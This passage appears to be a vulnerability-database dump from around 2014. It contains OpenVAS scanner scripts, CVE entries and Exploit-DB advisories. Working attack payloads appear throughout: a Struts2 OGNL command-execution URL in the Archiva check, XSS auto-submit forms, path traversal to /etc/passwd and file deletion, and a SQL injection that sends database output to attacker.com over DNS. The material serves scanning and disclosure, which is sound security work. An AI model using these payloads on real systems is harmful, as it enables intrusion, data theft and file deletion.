script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"bugzilla\", rpm:\"bugzilla~4.2.9~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-22T16:40:24", "bulletinFamily": "scanner", "description": "Apache Archiva is prone to multiple remote command-execution\nvulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2014-01-15T00:00:00", "id": "OPENVAS:1361412562310103883", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103883", "title": "Apache Archiva Multiple Remote Command Execution Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_archivo_rce_01_14.nasl 11867 2018-10-12 10:48:11Z cfischer $\n#\n# Apache Archiva Multiple Remote Command Execution Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:apache:archiva\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103883\");\n script_cve_id(\"CVE-2013-2251\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 11867 $\");\n\n script_name(\"Apache Archiva Multiple Remote Command Execution Vulnerabilities\");\n\n\n script_xref(name:\"URL\", value:\"http://cxsecurity.com/issue/WLB-2014010087\");\n script_xref(name:\"URL\", value:\"http://struts.apache.org/release/2.3.x/docs/s2-016.html\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:48:11 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-01-15 18:13:42 +0100 (Wed, 15 Jan 2014)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_archiva_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"apache_archiva/installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploits will allow remote attackers to execute arbitrary\ncommands within the context of the affected application.\");\n script_tag(name:\"vuldetect\", value:\"Send a special crafted HTTP GET request and check the response.\");\n script_tag(name:\"insight\", value:\"Apache Archiva use Apache Struts2:\n'In Struts 2 before 2.3.15.1 the information following 'action:', 'redirect:' or\n'redirectAction:' is not properly 
sanitized. Since said information will be evaluated as\nOGNL expression against the value stack, this introduces the possibility to inject server\nside code.'\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"summary\", value:\"Apache Archiva is prone to multiple remote command-execution\nvulnerabilities.\");\n script_tag(name:\"affected\", value:\"Apache Archiva <= 1.3.6\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\n\nif( ! port = get_app_port(cpe:CPE) ) exit (0);\nif( ! dir = get_app_location( cpe:CPE, port:port ) ) exit (0);\n\ncmds = exploit_commands();\n\nforeach cmd ( keys( cmds ) )\n{\n url = dir +\n '/security/login.action?redirect:' +\n '${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%27' +\n cmds[cmd] +\n '%27})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b)' +\n ',%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23' +\n 'matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23' +\n 'matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}';\n\n if( buf = http_vuln_check( port:port, url:url, pattern:cmd, bodyonly:TRUE ) )\n {\n buf = str_replace( string:buf, find:raw_string( 0x00 ), replace:\"\");\n report = 'It was possible to execute the command \"' + cmds[cmd] + '\" on the remote\\nhost which produces the following output:\\n\\n' + buf + '\\n';\n security_message( port:port, data: report );\n exit (0);\n }\n}\n\nexit (99);\n", "cvss": 
{"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2018-10-10T11:05:20", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in OrbitScripts Orbit Open Ad Server before 1.1.1 allows remote attackers to execute arbitrary SQL commands via the site_directory_sort_field parameter to guest/site_directory.", "modified": "2018-10-09T15:43:30", "published": "2014-04-11T10:55:05", "id": "CVE-2014-2540", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2540", "title": "CVE-2014-2540", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-08-29T10:48:11", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in the VideoWhisper Live Streaming Integration plugin before 4.29.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) m parameter to lb_status.php; (2) msg parameter to vc_chatlog.php; n parameter to (3) channel.php, (4) htmlchat.php, (5) video.php, or (6) videotext.php; (7) message parameter to lb_logout.php; or ct parameter to (8) lb_status.php or (9) v_status.php in ls/.", "modified": "2017-08-28T21:34:28", "published": "2014-03-06T10:55:28", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1906", "id": "CVE-2014-1906", "title": "CVE-2014-1906", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-03T20:08:20", "bulletinFamily": "NVD", "description": "Unrestricted file upload vulnerability in ls/vw_snapshots.php in the VideoWhisper Live Streaming Integration plugin before 4.29.5 for WordPress allows remote attackers to execute arbitrary PHP code by uploading a file with a double extension, and then accessing the file via a direct request to a wp-content/plugins/videowhisper-live-streaming-integration/ls/snapshots/ pathname, as 
demonstrated by a .php.jpg filename.", "modified": "2014-12-30T11:37:00", "published": "2014-12-29T15:59:00", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1905", "id": "CVE-2014-1905", "title": "CVE-2014-1905", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-10T11:05:20", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in whizzywig/wb.php in CMSimple Classic 3.54 and earlier, possibly as downloaded before February 26, 2014, allows remote attackers to inject arbitrary web script or HTML via the d parameter.", "modified": "2018-10-09T15:43:12", "published": "2014-03-20T12:55:17", "id": "CVE-2014-2219", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2219", "title": "CVE-2014-2219", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-10-10T11:05:19", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in library/clicktracker.php in the AdRotate Pro plugin 3.9 through 3.9.5 and AdRotate Free plugin 3.9 through 3.9.4 for WordPress allows remote attackers to execute arbitrary SQL commands via the track parameter.", "modified": "2018-10-09T15:43:00", "published": "2014-02-27T10:55:15", "id": "CVE-2014-1854", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1854", "title": "CVE-2014-1854", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-10T11:05:20", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in classes/controller/error.php in Open Classifieds 2 before 2.1.3 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to shared-apartments-rooms/.", "modified": "2018-10-09T15:43:05", "published": "2014-03-14T10:55:04", "id": "CVE-2014-2024", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2024", "title": "CVE-2014-2024", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-10-10T11:05:20", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in vwrooms\\templates\\logout.tpl.php in the VideoWhisper Webcam plugins for Drupal 7.x allow remote attackers to inject arbitrary web script or HTML via the (1) module or (2) message parameter to index.php.", "modified": "2018-10-09T15:43:34", "published": "2014-04-28T10:09:07", "id": "CVE-2014-2715", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2715", "title": "CVE-2014-2715", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-10-10T11:05:19", "bulletinFamily": "NVD", "description": "OpenDocMan 1.2.7 and earlier does not properly validate allowed actions, which allows remote authenticated users to bypass an intended access restrictions and assign administrative privileges to themselves via a crafted request to signup.php.", "modified": "2018-10-09T15:43:05", "published": "2018-04-10T11:29:00", "id": "CVE-2014-1946", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1946", "title": "CVE-2014-1946", "type": "cve", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-10T11:05:20", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in content.aspx in Ektron CMS 8.7 before 8.7.0.055 allows remote authenticated users to inject arbitrary web script or HTML via the category0 parameter, which is not properly handled when displaying the Subjects tab in the View Properties menu option.", "modified": "2018-10-09T15:43:35", "published": "2014-04-25T10:15:30", "id": "CVE-2014-2729", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2729", "title": "CVE-2014-2729", "type": "cve", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-09-22T10:41:24", "bulletinFamily": "NVD", "description": "Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.", "modified": "2017-09-21T21:29:00", "published": "2013-07-19T23:37:30", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2251", "id": "CVE-2013-2251", "title": "CVE-2013-2251", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-03T15:55:41", "bulletinFamily": "exploit", "description": "Wordpress VideoWhisper 4.27.3 - Multiple Vulnerabilities. CVE-2014-1905,CVE-2014-1906,CVE-2014-1907,CVE-2014-1908. Webapps exploit for php platform", "modified": "2014-02-28T00:00:00", "published": "2014-02-28T00:00:00", "id": "EDB-ID:31986", "href": "https://www.exploit-db.com/exploits/31986/", "type": "exploitdb", "title": "WordPress VideoWhisper 4.27.3 - Multiple Vulnerabilities", "sourceData": "Advisory ID: HTB23199\r\nProduct: VideoWhisper Live Streaming Integration\r\nVendor: VideoWhisper\r\nVulnerable Version(s): 4.27.3 and probably prior\r\nTested Version: 4.27.3\r\nAdvisory Publication: February 6, 2014 [without technical details]\r\nVendor Notification: February 6, 2014\r\nVendor Patch: February 7, 2014\r\nPublic Disclosure: February 27, 2014\r\nVulnerability Type: Unrestricted Upload of File with Dangerous Type [CWE-434], Cross-Site Scripting [CWE-79], Path Traversal [CWE-22], Information Exposure Through Externally-Generated Error Message [CWE-211]\r\nCVE References: CVE-2014-1905, CVE-2014-1906, CVE-2014-1907, CVE-2014-1908\r\nRisk Level: Critical\r\nCVSSv2 Base Scores: 9.3 
(AV:N/AC:M/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in VideoWhisper Live Streaming Integration, which can be exploited to execute arbitrary code on the target system, gain access to potentially sensitive data, perform Cross-Site Scripting (XSS) attacks against users of vulnerable application and delete arbitrary files.\r\n\r\n1) Arbitrary File Upload in VideoWhisper Live Streaming Integration: CVE-2014-1905\r\n\r\nVideoWhisper Live Streaming Integration does not properly verify malicious file extensions before uploading files to the server in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snaps\r\nhots.php\". A remote attacker can upload and execute arbitrary PHP file on the target system.\r\n\r\nThe following PoC code demonstrates exploitation of the vulnerability:\r\n\r\nAfter successful exploitation the remote shell will be accessible via the following URL:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/snapshots/1.php.jpg\r\n\r\nSuccessful exploitation of this vulnerability requires that the webserver is not configured to handle the mime-type for media files with .jpg extension.\r\n\r\n2) Cross-Site Scripting (XSS) in VideoWhisper Live Streaming Integration: CVE-2014-1906\r\n\r\n2.1 The vulnerability exists due to insufficient filtration of \"m\" HTTP POST parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_statu\r\ns.php\" script. 
A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary HTML and script code in browser in context of the vulnerable website when user visits a page with enabled plugin\u2019s widget. The script will be also executed in administrative section on the following page:\r\n\r\nhttp://[host]/wp-admin/options-general.php?page=videowhisper_streaming.p\r\nhp&tab=live\r\n\r\nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/lb_status.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"s\" value=\"1\">\r\n<input type=\"hidden\" name=\"u\" value=\"1\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n<input type=\"hidden\" name=\"m\" value=\"<script>alert('immuniweb')</script>\">\r\n</form>\r\n</body>\r\n\r\n2.2 The vulnerability exists due to insufficient filtration of \"msg\" HTTP POST parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatl\r\nog.php\" script. 
A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits the affected page.\r\n\r\nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/vc_chatlog.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"msg\" value=\"<script>alert('immuniweb')</script>\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n</form>\r\n</body>\r\n\r\nThe code will be executed when the user visits the following URL:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/uploads/[room]/Log[date].html\r\n\r\nWhere [room] is set by HTTP POST parameter r and [date] is the current date.\r\n\r\n2.3 The vulnerabilities exist due to insufficient filtration of \"n\" HTTP GET parameter passed to scripts \"channel.php\", \"htmlchat.php\", \"video.php\" and \"videotext.php\" within the \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/\" directory. 
A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/channel.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3\r\nE\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/htmlchat.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%\r\n3E\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/video.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/videotext.php?n=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/sc\r\nript%3E\r\n\r\n2.4 The vulnerability exists due to insufficient filtration of \"message\" HTTP GET parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logou\r\nt.php\" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/lb_logout.php?message=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/\r\nscript%3E\r\n\r\n2.5 The vulnerability exists due to insufficient filtration of \"ct\" HTTP POST parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_statu\r\ns.php\" script. 
A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/lb_status.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"s\" value=\"1\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\">\r\n</form>\r\n</body>\r\n\r\n2.6 The vulnerability exists due to insufficient filtration of \"ct\" HTTP POST parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status\r\n.php\" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/v_status.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"s\" value=\"1\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\">\r\n</form>\r\n</body>\r\n\r\n3) Path Traversal in VideoWhisper Live Streaming Integration: CVE-2014-1907\r\n\r\n3.1 The vulnerability exists due to insufficient filtration of \"s\" HTTP GET parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_log\r\nin.php\" script. 
A remote attacker can view contents of arbitrary files on the target system using directory traversal sequences.\r\n\r\nThe exploitation example below displays contents of \"/etc/passwd\" file:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/rtmp_login.php?s=../../../../../../etc/passwd\r\n\r\n3.2 The vulnerability exists due to insufficient filtration of \"s\" HTTP GET parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_log\r\nout.php\" script. A remote attacker can delete arbitrary files on the target system using directory traversal sequences.\r\n\r\nThe exploitation example below deletes a file \"/tmp/immuniweb\":\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/rtmp_logout.php?s=../../../../../../../../tmp/immuniweb\r\n\r\nSuccessful exploitation of this vulnerability requires that file \"/tmp/immuniweb\" exists on the system.\r\n\r\n4) Information Exposure Through Externally-generated Error Message in VideoWhisper Live Streaming Integration: CVE-2014-1908\r\n\r\n4.1 The vulnerability exists due to improper implementation of error handling mechanisms in multiple scripts. 
A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and gain knowledge of full installation path of the application.\r\n\r\nThe following URL can be used to gain knowledge of full installation path of the application:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/bp.php\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/videowhisper_streaming.php\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/rtmp.inc.php\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nSolution:\r\n\r\nUpdate to VideoWhisper Live Streaming Integration version 4.29.5\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23089 - https://www.htbridge.com/advisory/HTB23089 - Multiple Vulnerabilities in VideoWhisper Live Streaming Integration Plugin for WordPress.\r\n[2] VideoWhisper Live Streaming Integration - http://wordpress.org/plugins/videowhisper-live-streaming-integration/ - The VideoWhisper Live Streaming software can easily be used to add video broadcasting features to WordPress sites and live video streams on blog pages.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability 
testing.\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/31986/"}, {"lastseen": "2016-02-03T17:48:06", "bulletinFamily": "exploit", "description": "Orbit Open Ad Server 1.1.0 - SQL Injection. CVE-2014-2540. Webapps exploit for php platform", "modified": "2014-04-10T00:00:00", "published": "2014-04-10T00:00:00", "id": "EDB-ID:32792", "href": "https://www.exploit-db.com/exploits/32792/", "type": "exploitdb", "title": "Orbit Open Ad Server 1.1.0 - SQL Injection", "sourceData": "Advisory ID: HTB23208\r\nProduct: Orbit Open Ad Server\r\nVendor: OrbitScripts, LLC\r\nVulnerable Version(s): 1.1.0 and probably prior\r\nTested Version: 1.1.0\r\nAdvisory Publication: March 19, 2014 [without technical details]\r\nVendor Notification: March 19, 2014 \r\nVendor Patch: March 21, 2014 \r\nPublic Disclosure: April 9, 2014 \r\nVulnerability Type: SQL Injection [CWE-89]\r\nCVE Reference: CVE-2014-2540\r\nRisk Level: High \r\nCVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered a vulnerability in Orbit Open Ad Server, which can be exploited to perform SQL Injection attacks, alter SQL requests to database of vulnerable application and potentially gain control over 
the vulnerable website.\r\n\r\n1) SQL Injection in Orbit Open Ad Server: CVE-2014-2540\r\n\r\nInput passed via the \"site_directory_sort_field\" HTTP POST parameter to \"/guest/site_directory\" URL is not properly sanitised before being used in SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL commands.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\n\r\n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\">\r\n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\">\r\n<input type=\"hidden\" name=\"category_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\">\r\n<input type=\"hidden\" name=\"form_mode\" value=\"save\">\r\n<input type=\"hidden\" name=\"image_size_filter\" value=\"12\">\r\n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\">\r\n<input type=\"hidden\" name=\"site_directory_sort_direction\" value=\"asc\">\r\n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\nThe second PoC code works against any platform (UNIX/Windows) and uses blind SQL injection brute-force 
(dichotomy) technique to extract data from the database:\r\n\r\n\r\n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\">\r\n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\">\r\n<input type=\"hidden\" name=\"category_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\">\r\n<input type=\"hidden\" name=\"form_mode\" value=\"save\">\r\n<input type=\"hidden\" name=\"image_size_filter\" value=\"12\">\r\n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\">\r\n<input type=\"hidden\" name=\"site_directory_sort_direction\" value=\"asc\">\r\n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(SELECT IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=0,1, BENCHMARK(22000000,MD5(NOW()))))\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Orbit Open Ad Server 1.1.1\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23208 - https://www.htbridge.com/advisory/HTB23208 - SQL Injection in Orbit Open Ad Server.\r\n[2] Orbit Open Ad Server - http://orbitopenadserver.com/ - the free, open source ad tool that lets you manage the profits while we manage the technology.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of 
software weakness types.\r\n[5] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/32792/"}, {"lastseen": "2016-02-03T17:37:19", "bulletinFamily": "exploit", "description": "Wordpress XCloner Plugin 3.1.0 - CSRF Vulnerability. CVE-2014-2340. Webapps exploit for php platform", "modified": 